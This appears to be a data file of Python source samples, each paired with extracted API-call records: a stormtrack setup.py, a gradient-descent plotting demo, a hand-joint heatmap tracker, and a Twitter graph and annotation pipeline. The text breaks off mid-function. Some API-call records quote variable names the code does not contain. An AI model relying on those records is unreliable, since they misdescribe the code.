    """Read a text file and return its lines, each stripped, joined by newlines."""
    with open(path, "r") as handle:
        return "\n".join(line.strip() for line in handle)
# Files concatenated into the package's long description.
description_files = ["README.md", "HISTORY.md"]
# Package metadata forwarded to setup() below.
metadata = {
    "name": "stormtrack",
    "version": "0.4.6",
    "description": "Track two-dimensional features over time in high-resolution weather/climate data.",
    "long_description": "\n\n".join([read_file(f) for f in description_files]),
    "author": "<NAME>",
    "author_email": "<EMAIL>",
    "url": "https://github.com/ruestefa/stormtrack",
    "keywords": "stormtrack",
    "classifiers": [
        "Development Status :: 2 - Pre-Alpha",
        "Intended Audience :: Developers",
        "Natural Language :: English",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Cython",
    ],
}
# python = "==3.7.*"
python = ">=3.7"
# Runtime dependencies; note basemap is pulled straight from its git repository.
dependencies = [
    "basemap @ git+https://github.com/matplotlib/basemap.git",
    "cython",
    "click >= 6.0",
    "descartes",
    "h5py",
    "python-igraph",
    "netcdf4",
    "numpy",
    "matplotlib",
    "scipy",
    "shapely",
    "pillow",
    "pytz",
    "pyproj",
]
# Console entry points ("name=module:callable").
scripts = [
    # Main
    "identify-features=stormtrack.identify_features:cli",
    "identify-front-fields=stormtrack.identify_front_fields:cli",
    "track-features=stormtrack.track_features:cli",
    # Additional
    "group-tracks=stormtrack.scripts.group_tracks:cli",
    "inspect-tracks=stormtrack.scripts.inspect_tracks:cli",
    "project-tracks=stormtrack.scripts.project_tracks:cli",
]
# Compile FORTRAN files
# NOTE(review): this f2py compilation runs at setup-import time as a side
# effect, and the modulename mixes a path prefix with dotted module syntax
# ("src/stormtrack.extra.fronts._libfronts") -- verify the produced module
# actually lands where the package expects it.
with open("src/stormtrack/extra/fronts/_libfronts.f77", "rb") as f:
    code = f.read()
stat = f2py.compile(code, modulename="src/stormtrack.extra.fronts._libfronts")
if stat != 0:
    raise Exception("f2py failed", stat)
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiler-options
Compiler.Options.annotate = True
# https://cython.readthedocs.io/en/latest/src/userguide/source_files_and_compilation.html#compiler-directives
compiler_directives={"embedsignature": True}
extensions = [
    # Extension("*", ["src/**/*.pyx"], extra_compile_args=["-O0"]),
    Extension("*", ["src/**/*.pyx"], extra_compile_args=["-O3"]),
]
# Cython-specific keyword arguments merged into the setup() call.
# NOTE(review): "compiler_directives" is not a recognised setup() keyword and
# is not passed to cythonize() (which only receives language_level) -- confirm
# the embedsignature directive is actually applied.
cython_setup = {
    "ext_modules": cythonize(extensions, compiler_directives={"language_level": 3}),
    "cmdclass": {"build_ext": build_ext},
    "include_dirs": [numpy.get_include()],
    "compiler_directives": compiler_directives,
}
setup(
    python_requires=python,
    install_requires=dependencies,
    entry_points={"console_scripts": scripts},
    packages=find_packages("src"),
    package_dir={"": "src"},
    include_package_data=True,
    **cython_setup,
    **metadata,
)
| [
"Cython.Build.cythonize",
"numpy.f2py.compile",
"setuptools.extension.Extension",
"numpy.get_include",
"setuptools.find_packages"
] | [((2089, 2160), 'numpy.f2py.compile', 'f2py.compile', (['code'], {'modulename': '"""src/stormtrack.extra.fronts._libfronts"""'}), "(code, modulename='src/stormtrack.extra.fronts._libfronts')\n", (2101, 2160), False, 'from numpy import f2py\n'), ((2601, 2661), 'setuptools.extension.Extension', 'Extension', (['"""*"""', "['src/**/*.pyx']"], {'extra_compile_args': "['-O3']"}), "('*', ['src/**/*.pyx'], extra_compile_args=['-O3'])\n", (2610, 2661), False, 'from setuptools.extension import Extension\n'), ((2702, 2766), 'Cython.Build.cythonize', 'cythonize', (['extensions'], {'compiler_directives': "{'language_level': 3}"}), "(extensions, compiler_directives={'language_level': 3})\n", (2711, 2766), False, 'from Cython.Build import cythonize\n'), ((2831, 2850), 'numpy.get_include', 'numpy.get_include', ([], {}), '()\n', (2848, 2850), False, 'import numpy\n'), ((3034, 3054), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {}), "('src')\n", (3047, 3054), False, 'from setuptools import find_packages\n')] |
import numpy as np
import matplotlib.pyplot as plt
import gd
if __name__ == "__main__":

    def objective(point):
        """Quadratic test function f(x, y) = 5x^2 - 6xy + 3y^2 + 6x - 6y."""
        px, py = point[0], point[1]
        return 5 * px ** 2 - 6 * px * py + 3 * py ** 2 + 6 * px - 6 * py

    def gradient(point):
        """Analytic gradient of ``objective``."""
        px, py = point[0], point[1]
        return np.array([10 * px - 6 * py + 6, 6 * py - 6 * px - 6])

    # Run gradient descent from (1, 1) and report the minimiser/optimum.
    algo = gd.GradiantDecent(objective, gradient)
    start = np.array([1, 1])
    algo.solve(start)
    print(algo.x_)
    print(algo.opt_)

    # Visualise the descent path on top of the objective's contour lines.
    plt.scatter(start[0], start[1], color="k", marker="o")
    plt.plot(algo.path_[:, 0], algo.path_[:, 1], color="k", linewidth=1.5)
    grid_x = np.linspace(-2, 2, 300)
    grid_y = np.linspace(-2, 2, 300)
    xmesh, ymesh = np.meshgrid(grid_x, grid_y)
    stacked = np.r_[xmesh.reshape(1, -1), ymesh.reshape(1, -1)]
    contour_levels = [-3, -2.9, -2.8, -2.6, -2.4, -2.2, -2, -1, 0, 1, 2, 3, 4]
    plt.contour(grid_x, grid_y, objective(stacked).reshape(xmesh.shape),
                levels=contour_levels, colors="k", linestyles="dotted")
    plt.show()
| [
"numpy.meshgrid",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"gd.GradiantDecent",
"numpy.array",
"numpy.linspace"
] | [((339, 363), 'gd.GradiantDecent', 'gd.GradiantDecent', (['f', 'df'], {}), '(f, df)\n', (356, 363), False, 'import gd\n'), ((378, 394), 'numpy.array', 'np.array', (['[1, 1]'], {}), '([1, 1])\n', (386, 394), True, 'import numpy as np\n'), ((468, 526), 'matplotlib.pyplot.scatter', 'plt.scatter', (['initial[0]', 'initial[1]'], {'color': '"""k"""', 'marker': '"""o"""'}), "(initial[0], initial[1], color='k', marker='o')\n", (479, 526), True, 'import matplotlib.pyplot as plt\n'), ((531, 601), 'matplotlib.pyplot.plot', 'plt.plot', (['algo.path_[:, 0]', 'algo.path_[:, 1]'], {'color': '"""k"""', 'linewidth': '(1.5)'}), "(algo.path_[:, 0], algo.path_[:, 1], color='k', linewidth=1.5)\n", (539, 601), True, 'import matplotlib.pyplot as plt\n'), ((611, 634), 'numpy.linspace', 'np.linspace', (['(-2)', '(2)', '(300)'], {}), '(-2, 2, 300)\n', (622, 634), True, 'import numpy as np\n'), ((644, 667), 'numpy.linspace', 'np.linspace', (['(-2)', '(2)', '(300)'], {}), '(-2, 2, 300)\n', (655, 667), True, 'import numpy as np\n'), ((687, 706), 'numpy.meshgrid', 'np.meshgrid', (['xs', 'ys'], {}), '(xs, ys)\n', (698, 706), True, 'import numpy as np\n'), ((941, 951), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (949, 951), True, 'import matplotlib.pyplot as plt\n'), ((276, 326), 'numpy.array', 'np.array', (['[10 * x - 6 * y + 6, -6 * x + 6 * y - 6]'], {}), '([10 * x - 6 * y + 6, -6 * x + 6 * y - 6])\n', (284, 326), True, 'import numpy as np\n')] |
import cv2
import numpy as np
def track_hand(results, frame, net):
    """Locate 21 hand-joint positions in ``frame`` and draw them.

    :param results: detection result exposing ``multi_hand_landmarks``
        (presumably MediaPipe Hands output -- confirm with the caller).
    :param frame: image array of shape (h, w, 3); modified in place.
    :param net: wrapper whose ``net.model`` predicts on a (1, 256, 256, 3)
        batch; its third output is assumed to be a (1, 32, 32, 21) stack
        of per-joint heatmaps -- TODO confirm against the model.
    :return: tuple ``(frame, joint_list)`` where ``joint_list`` is a
        (21, 2) int array of joint coordinates in full-frame space.
    """
    hand_landmarks = results.multi_hand_landmarks[0]
    h, w, _ = frame.shape
    # Landmark coordinates are normalised; convert to pixel positions.
    x_list = [int(lm.x * w) for lm in hand_landmarks.landmark]
    y_list = [int(lm.y * h) for lm in hand_landmarks.landmark]
    # Square bounding box with a 10-pixel margin around the hand.
    xmin, xmax = min(x_list) - 10, max(x_list) + 10
    ymin, ymax = min(y_list) - 10, max(y_list) + 10
    bxmin = xmin
    bymin = ymin
    side = max(xmax - xmin, ymax - ymin)
    bxmax = xmin + side
    bymax = ymin + side
    boundbox = bxmin, bymin, bxmax, bymax
    crop_img = frame[boundbox[1]:boundbox[3], boundbox[0]:boundbox[2]].copy()
    final_frame = cv2.resize(crop_img, (256, 256), interpolation=cv2.INTER_CUBIC)
    final_frame = np.reshape(final_frame, (1, 256, 256, 3))
    result = net.model.predict_on_batch(final_frame)
    heatmap = result[2]
    joint_list = peak_joint_positions(heatmap)
    # The heatmap is 32x32 for the 256x256 crop: scale up by 8 and shift
    # back into full-frame coordinates.
    joint_list = joint_list * 8
    for i in range(0, 21):
        # NOTE(review): rows of joint_list are (heatmap row, heatmap col),
        # i.e. (y, x), yet the x-offset is added to index 0 and the y-offset
        # to index 1 -- behaviour preserved from the original; confirm the
        # intended axis convention.
        joint_list[i][0] += bxmin
        joint_list[i][1] += bymin
        cv2.circle(frame, joint_list[i], radius=2, color=(255, 0, 255))
    return frame, joint_list


def peak_joint_positions(heatmap):
    """Return a (joints, 2) int array with the argmax (row, col) of each joint map.

    Internal helper for :func:`track_hand`. Vectorised replacement for the
    original triple Python loop: besides being far faster, it fixes a latent
    NameError the loop had when every activation of the first joint map was
    <= 0 (``max_j``/``max_k`` were only assigned on a strictly positive
    improvement). For positive peaks the result is identical -- the first
    maximum in row-major order is selected.
    """
    maps = np.asarray(heatmap)[0]                    # (rows, cols, joints)
    flat = maps.reshape(-1, maps.shape[-1])
    best = flat.argmax(axis=0)                       # first max per joint
    rows, cols = np.unravel_index(best, maps.shape[:2])
    return np.stack([rows, cols], axis=1).astype(np.int64)
| [
"numpy.asarray",
"cv2.circle",
"numpy.reshape",
"cv2.resize"
] | [((861, 924), 'cv2.resize', 'cv2.resize', (['crop_img', '(256, 256)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(crop_img, (256, 256), interpolation=cv2.INTER_CUBIC)\n', (871, 924), False, 'import cv2\n'), ((942, 983), 'numpy.reshape', 'np.reshape', (['final_frame', '(1, 256, 256, 3)'], {}), '(final_frame, (1, 256, 256, 3))\n', (952, 983), True, 'import numpy as np\n'), ((1570, 1592), 'numpy.asarray', 'np.asarray', (['joint_list'], {}), '(joint_list)\n', (1580, 1592), True, 'import numpy as np\n'), ((1728, 1791), 'cv2.circle', 'cv2.circle', (['frame', 'joint_list[i]'], {'radius': '(2)', 'color': '(255, 0, 255)'}), '(frame, joint_list[i], radius=2, color=(255, 0, 255))\n', (1738, 1791), False, 'import cv2\n'), ((1453, 1473), 'numpy.asarray', 'np.asarray', (['pos_list'], {}), '(pos_list)\n', (1463, 1473), True, 'import numpy as np\n')] |
__author__ = '<NAME> (<EMAIL>)'
import gc
import os
import json
from multiprocessing import Pool
from functools import partial
import numpy as np
import scipy.sparse as spsp
import networkx as nx
from reveal_user_annotation.common.config_package import get_threads_number
from reveal_user_annotation.common.datarw import store_pickle, load_pickle
from reveal_user_annotation.mongo.preprocess_data import extract_graphs_and_lemmas_from_tweets,\
extract_connected_components
from reveal_user_annotation.text.map_data import chunks
from reveal_user_annotation.text.clean_text import clean_single_word
from reveal_user_annotation.twitter.clean_twitter_list import user_twitter_list_bag_of_words
from reveal_user_annotation.twitter.manage_resources import get_reveal_set, get_topic_keyword_dictionary
from reveal_user_annotation.twitter.user_annotate import form_user_term_matrix, form_lemma_tokeyword_map, filter_user_term_matrix
from reveal_graph_embedding.datautil.snow_datautil import read_adjacency_matrix, scipy_sparse_to_csv,\
write_screen_name_to_topics
from reveal_user_classification.datautil.make_directory_tree import make_sure_path_exists
from reveal_user_classification.embedding.implicit import get_adjacency_matrix_via_combinatorial_laplacian,\
get_adjacency_matrix_via_directed_laplacian, get_multiview_transition_matrix, get_implicit_adjacency_matrices
def submatrix_pull_via_networkx(matrix, node_array, directed=True):
    """Extract the submatrix induced by ``node_array``.

    The matrix is round-tripped through a networkx (Di)Graph so that the
    induced subgraph machinery does the index bookkeeping; the result is
    returned as a float64 CSR matrix.
    """
    graph_type = nx.DiGraph() if directed else nx.Graph()
    graph = nx.from_scipy_sparse_matrix(matrix, create_using=graph_type)
    induced = graph.subgraph(list(node_array))
    return nx.to_scipy_sparse_matrix(induced, dtype=np.float64, format="csr")
def coo_submatrix_pull(matrix, row_array, col_array):
    """Extract the submatrix of a COO sparse matrix given row/column indices.

    :param matrix: ``scipy.sparse.coo_matrix`` to slice.
    :param row_array: array of row indices to keep (order defines new rows).
    :param col_array: array of column indices to keep (order defines new cols).
    :return: ``coo_matrix`` of shape ``(len(row_array), len(col_array))``.
    :raises TypeError: if ``matrix`` is not in COO format.

    Fixes over the original: the index-map arrays were built with
    ``np.ones`` (float dtype) and the float values were then used as COO
    row/column indices, which modern scipy rejects; the local name ``gc``
    also shadowed the imported ``gc`` module.
    """
    if not isinstance(matrix, spsp.coo_matrix):
        raise TypeError("Matrix must be sparse COOrdinate format")
    row_array = np.asarray(row_array)
    col_array = np.asarray(col_array)
    # Map each kept original index to its position in the submatrix;
    # -1 marks rows/columns that are dropped.
    row_map = np.full(matrix.shape[0], -1, dtype=np.intp)
    col_map = np.full(matrix.shape[1], -1, dtype=np.intp)
    row_map[row_array] = np.arange(row_array.size)
    col_map[col_array] = np.arange(col_array.size)
    # Keep only entries whose row AND column both survive.
    keep = (row_map[matrix.row] != -1) & (col_map[matrix.col] != -1)
    return spsp.coo_matrix(
        (matrix.data[keep],
         (row_map[matrix.row[keep]], col_map[matrix.col[keep]])),
        shape=(row_array.size, col_array.size))
def make_directory_tree(graph_dataset_folder):
    """Create the graph-dataset folder hierarchy and return its seven paths.

    Returns, in order: full graph, weakly connected graph, weakly connected
    labels, implicit graph, simple undirected implicit, combinatorial
    implicit, and directed implicit graph folders.
    """
    full_graph_folder = graph_dataset_folder + "/full_graph"
    weakly_connected_graph_folder = graph_dataset_folder + "/weakly_connected_graph"
    weakly_connected_label_folder = graph_dataset_folder + "/weakly_connected_graph/labels"
    implicit_graph_folder = weakly_connected_graph_folder + "/implicit_graph"
    simple_undirected_graph_folder = implicit_graph_folder + "/simple_undirected_implicit_graph"
    combinatorial_implicit_graph_folder = implicit_graph_folder + "/combinatorial_implicit_graph"
    directed_implicit_graph_folder = implicit_graph_folder + "/directed_implicit_graph"
    folders = (full_graph_folder,
               weakly_connected_graph_folder,
               weakly_connected_label_folder,
               implicit_graph_folder,
               simple_undirected_graph_folder,
               combinatorial_implicit_graph_folder,
               directed_implicit_graph_folder)
    # Ensure every folder exists on disk before returning the paths.
    for folder in folders:
        make_sure_path_exists(folder)
    return folders
def process_tweet_collection(tweet_generator, full_graph_folder):
    """Extract graphs/lemmas from a tweet stream and persist them.

    Each sparse matrix is stored both as a pickle and as a tab-separated
    edge list; the remaining artefacts are stored as pickles only, all under
    ``full_graph_folder``.
    """
    (mention_graph,
     retweet_graph,
     user_lemma_matrix,
     tweet_id_set,
     user_id_set,
     node_to_id,
     lemma_to_attribute,
     id_to_name) = extract_graphs_and_lemmas_from_tweets(tweet_generator)
    # Sparse matrices: pickle + edge-list TSV.
    for stem, matrix in (("mention_graph", mention_graph),
                         ("retweet_graph", retweet_graph),
                         ("user_lemma_matrix", user_lemma_matrix)):
        store_pickle(full_graph_folder + "/" + stem + ".pkl", matrix)
        scipy_sparse_to_csv(full_graph_folder + "/" + stem + ".tsv", matrix, "\t", directed=True)
    # Remaining artefacts: pickle only.
    for stem, obj in (("tweet_id_set", tweet_id_set),
                      ("user_id_set", user_id_set),
                      ("node_to_id", node_to_id),
                      ("lemma_to_attribute", lemma_to_attribute),
                      ("id_to_name", id_to_name)):
        store_pickle(full_graph_folder + "/" + stem + ".pkl", obj)
def weakly_connected_graph(full_graph_folder, weakly_connected_graph_folder):
    """Reduce the full graphs to a weakly connected component and persist them.

    Loads the pickled mention/retweet/user-lemma matrices, extracts the
    weakly connected component of the combined mention+retweet graph, pulls
    the corresponding submatrices, and stores them as edge-list TSVs plus
    the surviving user-id set and node-to-id map as pickles.
    """
    def _load_coo(stem):
        # CSR round-trip compacts the pickled matrix before COO conversion.
        pickled = load_pickle(full_graph_folder + "/" + stem + ".pkl")
        return spsp.coo_matrix(spsp.csr_matrix(pickled))

    mention_graph = _load_coo("mention_graph")
    retweet_graph = _load_coo("retweet_graph")
    user_lemma_matrix = _load_coo("user_lemma_matrix")
    user_id_set = load_pickle(full_graph_folder + "/user_id_set" + ".pkl")
    node_to_id = load_pickle(full_graph_folder + "/node_to_id" + ".pkl")

    # Component extraction runs on the combined mention+retweet graph.
    combined = spsp.coo_matrix(spsp.csr_matrix(mention_graph + retweet_graph))
    (weakly_connected_men_ret_graph,
     weakly_connected_node_to_id,
     old_node_list) = extract_connected_components(combined, "weak", node_to_id)

    # Twitter ids of the users that survive in the component.
    weakly_connected_user_id_set = set(list(weakly_connected_node_to_id.values()))
    node_array = np.array(old_node_list, dtype=np.int64)

    # Pull the matching submatrices for each view.
    weakly_connected_mention_graph = submatrix_pull_via_networkx(
        spsp.coo_matrix(mention_graph), node_array, directed=True)
    weakly_connected_retweet_graph = submatrix_pull_via_networkx(
        spsp.coo_matrix(retweet_graph), node_array, directed=True)
    weakly_connected_user_lemma_matrix = spsp.csr_matrix(user_lemma_matrix)[node_array, :]

    # COO format serialises naturally as an edge list.
    weakly_connected_mention_graph = spsp.coo_matrix(weakly_connected_mention_graph)
    weakly_connected_retweet_graph = spsp.coo_matrix(weakly_connected_retweet_graph)
    weakly_connected_user_lemma_matrix = spsp.coo_matrix(weakly_connected_user_lemma_matrix)

    for stem, graph in (("mention_graph", weakly_connected_mention_graph),
                        ("retweet_graph", weakly_connected_retweet_graph),
                        ("user_lemma_matrix", weakly_connected_user_lemma_matrix)):
        scipy_sparse_to_csv(weakly_connected_graph_folder + "/" + stem + ".tsv",
                            graph,
                            separator="\t",
                            directed=True)
    store_pickle(weakly_connected_graph_folder + "/user_id_set" + ".pkl", weakly_connected_user_id_set)
    store_pickle(weakly_connected_graph_folder + "/node_to_id" + ".pkl", weakly_connected_node_to_id)
def make_implicit_graphs(weakly_connected_graph_folder,
                         simple_undirected_graph_folder,
                         combinatorial_implicit_graph_folder,
                         directed_implicit_graph_folder):
    """Derive simple-undirected and implicit graphs and store them as TSVs.

    From the weakly connected mention/retweet graphs this builds, in order:
    symmetrised ("simple undirected") versions of each view and their
    average, implicit graphs via the combinatorial Laplacian, implicit
    graphs via the directed Laplacian, and finally multiview implicit
    graphs over both views.  Each result is written as a tab-separated
    edge list into the folder matching its kind.
    """
    def _as_coo(matrix):
        # CSR round-trip compacts the matrix; COO serialises as an edge list.
        return spsp.coo_matrix(spsp.csr_matrix(matrix))

    def _save(folder, stem, graph):
        scipy_sparse_to_csv(folder + "/" + stem + ".tsv", graph, separator="\t", directed=False)

    mention_graph = read_adjacency_matrix(weakly_connected_graph_folder + "/mention_graph.tsv", separator="\t")
    retweet_graph = read_adjacency_matrix(weakly_connected_graph_folder + "/retweet_graph.tsv", separator="\t")

    # --- Simple undirected graphs: symmetrise each directed view. ---
    simple_undirected_mention_graph = _as_coo((mention_graph + mention_graph.transpose()) / 2)
    _save(simple_undirected_graph_folder, "mention_graph", simple_undirected_mention_graph)
    gc.collect()
    print("Simple Undirected Mention Graph.")

    simple_undirected_retweet_graph = _as_coo((retweet_graph + retweet_graph.transpose()) / 2)
    _save(simple_undirected_graph_folder, "retweet_graph", simple_undirected_retweet_graph)
    gc.collect()
    print("Simple Undirected Retweet Graph.")

    simple_undirected_mr_graph = _as_coo((simple_undirected_mention_graph + simple_undirected_retweet_graph) / 2)
    _save(simple_undirected_graph_folder, "men_ret_graph", simple_undirected_mr_graph)
    gc.collect()
    print("Simple Undirected Mention+Retweet Graph.")

    # --- Implicit graphs from the combinatorial Laplacian (rho = 0.1). ---
    implicit_combinatorial_mention_graph, phi = get_adjacency_matrix_via_combinatorial_laplacian(mention_graph, 0.1)
    implicit_combinatorial_mention_graph = _as_coo(implicit_combinatorial_mention_graph)
    _save(combinatorial_implicit_graph_folder, "mention_graph", implicit_combinatorial_mention_graph)
    gc.collect()
    print("Implicit Combinatorial Mention Graph.")
    print(implicit_combinatorial_mention_graph.sum(axis=1))

    implicit_combinatorial_retweet_graph, phi = get_adjacency_matrix_via_combinatorial_laplacian(retweet_graph, 0.1)
    implicit_combinatorial_retweet_graph = _as_coo(implicit_combinatorial_retweet_graph)
    _save(combinatorial_implicit_graph_folder, "retweet_graph", implicit_combinatorial_retweet_graph)
    gc.collect()
    print("Implicit Combinatorial Retweet Graph.")
    print(implicit_combinatorial_retweet_graph.sum(axis=1))

    # --- Implicit graphs from the directed Laplacian (rho = 0.1). ---
    implicit_directed_mention_graph, phi = get_adjacency_matrix_via_directed_laplacian(mention_graph, 0.1)
    implicit_directed_mention_graph = _as_coo(implicit_directed_mention_graph)
    _save(directed_implicit_graph_folder, "mention_graph", implicit_directed_mention_graph)
    gc.collect()
    print("Implicit Directed Mention Graph.")
    print(implicit_directed_mention_graph.sum(axis=1))

    implicit_directed_retweet_graph, phi = get_adjacency_matrix_via_directed_laplacian(retweet_graph, 0.1)
    implicit_directed_retweet_graph = _as_coo(implicit_directed_retweet_graph)
    _save(directed_implicit_graph_folder, "retweet_graph", implicit_directed_retweet_graph)
    gc.collect()
    print("Implicit Directed Retweet Graph.")
    print(implicit_directed_retweet_graph.sum(axis=1))

    # --- Multiview implicit graphs over both views at once. ---
    men_ret_transition_matrix = get_multiview_transition_matrix([mention_graph,
                                                                 retweet_graph],
                                                                weights=None,
                                                                method="zhou")
    implicit_combinatorial_men_ret_graph, com_phi, \
        implicit_directed_men_ret_graph, dir_phi = get_implicit_adjacency_matrices(men_ret_transition_matrix,
                                                                                   rho=0.1)
    _save(combinatorial_implicit_graph_folder, "men_ret_graph", implicit_combinatorial_men_ret_graph)
    _save(directed_implicit_graph_folder, "men_ret_graph", implicit_directed_men_ret_graph)
    gc.collect()
    print("Implicit Mention-Retweet Graphs.")
def make_annotation(twitter_lists_folder, twitter_lists_keywords_folder, weakly_connected_graph_folder, weakly_connected_label_folder, full_graph_folder):
    """Annotate weakly-connected-component users from their Twitter lists.

    Converts stored Twitter-list pickles into per-user keyword JSON files
    (in parallel via a process pool), then builds and stores user-label
    matrices restricted to topics from the "reveal" set.

    :param twitter_lists_folder: folder of ``<user_id>.pkl`` Twitter-list dumps.
    :param twitter_lists_keywords_folder: folder of ``<user_id>.json`` annotations.
    :param weakly_connected_graph_folder: folder with the component's user/node data.
    :param weakly_connected_label_folder: output folder for the label matrices.
    :param full_graph_folder: folder holding the full-graph ``id_to_name`` map.
    :return: ``twitter_lists_folder`` (unchanged).
    """
    # TODO: Move keywords from Mongo to the folder.
    # Read set of users.
    weakly_connected_user_id_set = load_pickle(weakly_connected_graph_folder + "/user_id_set" + ".pkl")
    weakly_connected_node_to_id = load_pickle(weakly_connected_graph_folder + "/node_to_id" + ".pkl")
    id_to_name = load_pickle(full_graph_folder + "/id_to_name" + ".pkl")
    # Read set of twitter lists.
    twitter_list_file_list = os.listdir(twitter_lists_folder)
    twitter_list_file_list = [int(file_name[:-4]) for file_name in twitter_list_file_list]
    # Read which users are annotated.
    # NOTE(review): this listing happens BEFORE the pool below writes new
    # annotation files, so users annotated during this call are not included
    # in the matrix construction further down -- confirm this is intended.
    user_keywords_file_list = os.listdir(twitter_lists_keywords_folder)
    user_keywords_file_list = [int(file_name[:-5]) for file_name in user_keywords_file_list]
    # Find which twitter lists need to be preprocessed.
    user_twitter_id_list = [file_name for file_name in twitter_list_file_list if file_name in weakly_connected_user_id_set]
    user_twitter_id_list = [file_name for file_name in user_twitter_id_list if file_name not in user_keywords_file_list]
    twitter_list_file_list = [str(file_name) + ".pkl" for file_name in user_twitter_id_list]
    # Fan out annotation extraction over 2x the available threads.
    # NOTE(review): the pool is never closed/joined and the map results are
    # discarded -- consider a ``with Pool(...)`` block.
    pool = Pool(processes=get_threads_number()*2,)
    user_chunks = chunks(twitter_list_file_list, get_threads_number()*2)
    pool.map(partial(worker_function,
                     lemmatizing="wordnet",
                     source_folder=twitter_lists_folder,
                     target_folder=twitter_lists_keywords_folder),
             user_chunks)
    # # Make user-label matrix.
    user_keywords_file_list = [str(file_name) for file_name in user_keywords_file_list]
    user_twitter_list_keywords_gen = read_local_user_annotations(twitter_lists_keywords_folder,
                                                                 user_keywords_file_list)
    # Invert node -> twitter-id into twitter-id -> node for the component.
    weakly_connected_id_to_node = dict(zip(weakly_connected_node_to_id.values(),
                                           weakly_connected_node_to_id.keys()))
    # # twitter_id_to_weakly_connected_node = {int(twitter_id): weakly_connected_id_to_node[int(twitter_id)] for twitter_id in user_keywords_file_list if int(twitter_id) in weakly_connected_id_to_node.keys()}
    # node_twitter_list_keywords_gen = ((weakly_connected_id_to_node[int(user_twitter_id)], twitter_list_keywords) for user_twitter_id, twitter_list_keywords in user_twitter_list_keywords_gen if int(user_twitter_id) in weakly_connected_id_to_node.keys())
    # for node, j in user_twitter_list_keywords_gen:
    #     print(node, j)
    # Keep only annotated users that belong to the weakly connected component.
    implicated_user_twitter_list_keywords_gen = ((int(user_twitter_id), twitter_list_keywords) for user_twitter_id, twitter_list_keywords in user_twitter_list_keywords_gen if int(user_twitter_id) in weakly_connected_id_to_node.keys())
    # for node, j in user_twitter_list_keywords_gen:
    #     print(node, j)
    ####################################################################################################################
    # Semi-automatic user annotation.
    ####################################################################################################################
    # Gather the lemmatised keywords of every reveal topic that has keywords.
    reveal_set = get_reveal_set()
    topic_keyword_dict = get_topic_keyword_dictionary()
    available_topics = set(list(topic_keyword_dict.keys()))
    keyword_list = list()
    for topic in reveal_set:
        if topic in available_topics:
            keyword_list.extend(topic_keyword_dict[topic])
    lemma_set = list()
    for keyword in keyword_list:
        lemma = clean_single_word(keyword, lemmatizing="wordnet")
        lemma_set.append(lemma)
    lemma_set = set(lemma_set)
    # Reverse map: keyword -> topic (later topics overwrite on duplicates).
    keyword_topic_dict = dict()
    for topic, keyword_set in topic_keyword_dict.items():
        for keyword in keyword_set:
            keyword_topic_dict[keyword] = topic
    # Build the (unfiltered) user-label matrix and persist it and its maps.
    user_label_matrix, annotated_nodes, label_to_lemma, node_to_lemma_tokeywordbag = form_user_term_matrix(implicated_user_twitter_list_keywords_gen,
                                                                                                           weakly_connected_id_to_node,
                                                                                                           lemma_set=lemma_set,
                                                                                                           keyword_to_topic_manual=keyword_topic_dict)
    scipy_sparse_to_csv(weakly_connected_label_folder + "/unfiltered_user_label_matrix" + ".tsv",
                        user_label_matrix,
                        "\t",
                        directed=True)
    store_pickle(weakly_connected_label_folder + "/unfiltered_annotated_nodes" + ".pkl",
                 annotated_nodes)
    store_pickle(weakly_connected_label_folder + "/unfiltered_label_to_lemma" + ".pkl",
                 label_to_lemma)
    store_pickle(weakly_connected_label_folder + "/unfiltered_node_to_lemma_tokeywordbag" + ".pkl",
                 node_to_lemma_tokeywordbag)
    # Filter the matrix before the final store.
    user_label_matrix, annotated_user_ids, label_to_lemma = filter_user_term_matrix(user_label_matrix,
                                                                                    annotated_nodes,
                                                                                    label_to_lemma,
                                                                                    max_number_of_labels=None)
    lemma_to_keyword = form_lemma_tokeyword_map(annotated_nodes, node_to_lemma_tokeywordbag)
    # user_label_matrix, annotated_user_ids, label_to_lemma, lemma_to_keyword = semi_automatic_user_annotation(implicated_user_twitter_list_keywords_gen, weakly_connected_id_to_node)
    # Store user-label binary matrix.
    scipy_sparse_to_csv(weakly_connected_label_folder + "/user_label_matrix" + ".tsv",
                        user_label_matrix,
                        "\t",
                        directed=True)
    # Store user-label keyword matrix.
    write_screen_name_to_topics(weakly_connected_label_folder + "/user_name_to_topics" + ".tsv",
                                user_label_matrix,
                                weakly_connected_node_to_id,
                                id_to_name,
                                label_to_lemma,
                                lemma_to_keyword,
                                separator="\t")
    return twitter_lists_folder
def worker_function(file_name_list,
                    lemmatizing,
                    source_folder,
                    target_folder):
    """Extract bag-of-words annotations from stored Twitter lists.

    For each ``<user_id>.pkl`` file in ``source_folder``, reads the pickled
    Twitter-list corpus, reduces it to a bag of lemmas plus a
    lemma -> keyword-bag map, and writes the result to
    ``target_folder/<user_id>.json``.

    Bug fix: the original advanced the target-path generator only for
    processed users, so after any skipped user (pickle without a "lists"
    key) every subsequent result was written under the wrong user's
    filename. Source and target paths are now derived from the same file
    name in lockstep.
    """
    for file_name in file_name_list:
        source_path = source_folder + "/" + file_name
        target_path = target_folder + "/" + file_name[:-4] + ".json"
        twitter_lists_corpus = load_pickle(source_path)
        if "lists" not in twitter_lists_corpus.keys():
            # No Twitter lists stored for this user; nothing to annotate.
            continue
        twitter_lists_corpus = twitter_lists_corpus["lists"]
        bag_of_lemmas, lemma_to_keywordbag = user_twitter_list_bag_of_words(twitter_lists_corpus,
                                                                           lemmatizing)
        user_annotation = dict()
        user_annotation["bag_of_lemmas"] = bag_of_lemmas
        user_annotation["lemma_to_keywordbag"] = lemma_to_keywordbag
        with open(target_path, "w", encoding="utf-8") as fp:
            json.dump(user_annotation, fp)
def read_local_user_annotations(json_folder,
                                user_twitter_ids):
    """Yield ``(user_twitter_id, annotation)`` pairs read from JSON files.

    :param json_folder: folder containing one ``<user_twitter_id>.json`` per user.
    :param user_twitter_ids: iterable of ids; each id is yielded unchanged
        alongside the parsed contents of its JSON file.
    :raises ValueError: if ``json_folder`` is None (raised lazily, on first
        iteration, since this is a generator).

    Bug fix: the original raised StopIteration inside a generator body,
    which PEP 479 (Python 3.7+) converts into a RuntimeError; an explicit
    ValueError is raised instead.
    """
    if json_folder is None:
        raise ValueError("json_folder must not be None.")
    for user_twitter_id in user_twitter_ids:
